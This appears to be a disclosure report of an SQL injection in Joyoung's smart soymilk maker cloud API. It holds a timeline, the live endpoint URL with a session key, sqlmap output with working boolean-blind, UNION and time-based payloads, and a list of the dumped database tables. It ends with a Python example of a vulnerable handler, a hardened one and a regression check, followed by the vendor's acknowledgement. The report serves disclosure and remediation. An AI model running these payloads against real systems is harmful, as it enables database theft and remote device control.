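2015-02-06: Details reported to the vendor; awaiting vendor response
2015-02-06: Vendor confirmed; details disclosed to the vendor only
2015-02-16: Details disclosed to core white hats and relevant domain experts
2015-02-26: Details disclosed to regular white hats
2015-03-08: Details disclosed to intern white hats
2015-03-23: Details disclosed to the public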
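Cloud-side SQL injection in the Joyoung smart soymilk maker allows dumping the database / remotely controlling the soymilk maker
Injection point: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab"}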
back-end DBMS: MySQL 5.0.11
current database: 'rmsdb'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab' AND 3037=3037 AND 'eXzD'='eXzD"}

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab' UNION ALL SELECT CONCAT(0x717a627a71,0x69524b6e556761597a58,0x716b786b71),NULL,NULL,NULL,NULL#"}

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab' AND SLEEP(5) AND 'LprJ'='LprJ"}
---
back-end DBMS: MySQL 5.0.11
Database: rmsdb
[37 tables]
+------------------------+
| ia_app_version         |
| ia_appusers            |
| ia_appusers_filter     |
| ia_command_jy_jd       |
| ia_device_info         |
| ia_device_info2        |
| ia_device_info_2ali    |
| ia_device_info_2jd     |
| ia_fileupload          |
| ia_firmware_info       |
| ia_getui_usermap       |
| ia_menu_achievement    |
| ia_menu_collect        |
| ia_menu_discuss        |
| ia_menu_image_ref      |
| ia_menu_info           |
| ia_menu_info_history   |
| ia_menu_ingredients    |
| ia_menu_nutrition      |
| ia_menu_praise         |
| ia_menu_process        |
| ia_menu_tag            |
| ia_menu_tag_ref        |
| ia_oprecord            |
| ia_pmodel_menu         |
| ia_product_fault       |
| ia_productline         |
| ia_productmodel        |
| ia_sessionkey          |
| ia_user_configs        |
| ia_user_dev            |
| ia_user_feedback       |
| ia_user_feedback_reply |
| ia_user_message        |
| ia_user_vcode          |
| ia_userdev_menu        |
| operaterecord          |
+------------------------+
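The fix for this class of flaw, as an added example that is not the vendor's code or part of the original report: a handler that splices menuid into the SQL text next to one that validates the id format and binds it as a parameter, plus a regression check built on the boolean condition from the sqlmap output above. Assumptions: SQLite stands in for the MySQL backend, the columns and rows of ia_menu_info are constructed, and all function names are hypothetical.

```python
import json
import re
import sqlite3

MENUID_RE = re.compile(r"[0-9a-f]{32}")  # shape of the ids shown in the report
BASE_ID = "3d1bf3337b374a238d11c52a1992d4ab"

def make_db():
    # Constructed sample data; only the table name comes from the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ia_menu_info (menuid TEXT PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO ia_menu_info VALUES (?, ?)", (BASE_ID, "soy milk"))
    return db

def query_menu_detail_vulnerable(db, param):
    """Assumed pre-fix pattern: menuid is concatenated into the statement."""
    menuid = json.loads(param)["menuid"]
    sql = "SELECT menuid, name FROM ia_menu_info WHERE menuid = '" + menuid + "'"
    return db.execute(sql).fetchall()

def query_menu_detail_hardened(db, param):
    """Reject ids that are not 32 hex characters, then bind the value."""
    menuid = json.loads(param).get("menuid")
    if not isinstance(menuid, str) or not MENUID_RE.fullmatch(menuid):
        raise ValueError("invalid menuid")
    sql = "SELECT menuid, name FROM ia_menu_info WHERE menuid = ?"
    return db.execute(sql, (menuid,)).fetchall()

def responds_to_injected_condition(handler, db):
    """Regression check: True if the result changes with a condition
    appended to menuid (true vs. false variant of the reported payload)."""
    results = []
    for cond in ("3037=3037", "3037=3038"):
        param = json.dumps({
            "op_action": "queryMenuDetail",
            "menuid": f"{BASE_ID}' AND {cond} AND 'eXzD'='eXzD",
        })
        try:
            results.append(handler(db, param))
        except ValueError:
            results.append(None)  # request rejected before reaching the DB
    return results[0] != results[1]

if __name__ == "__main__":
    db = make_db()
    print(responds_to_injected_condition(query_menu_detail_vulnerable, db))
    print(responds_to_injected_condition(query_menu_detail_hardened, db))
```

Running the same check against every op_action that reaches the database in a CI job keeps a later refactor from reintroducing the concatenated form.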
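Severity: High
Vulnerability Rank: 20
Confirmed: 2015-02-06 15:23
Thanks to 路人甲 for pointing out the security flaw in our product; we will arrange remediation as soon as possible.
None yet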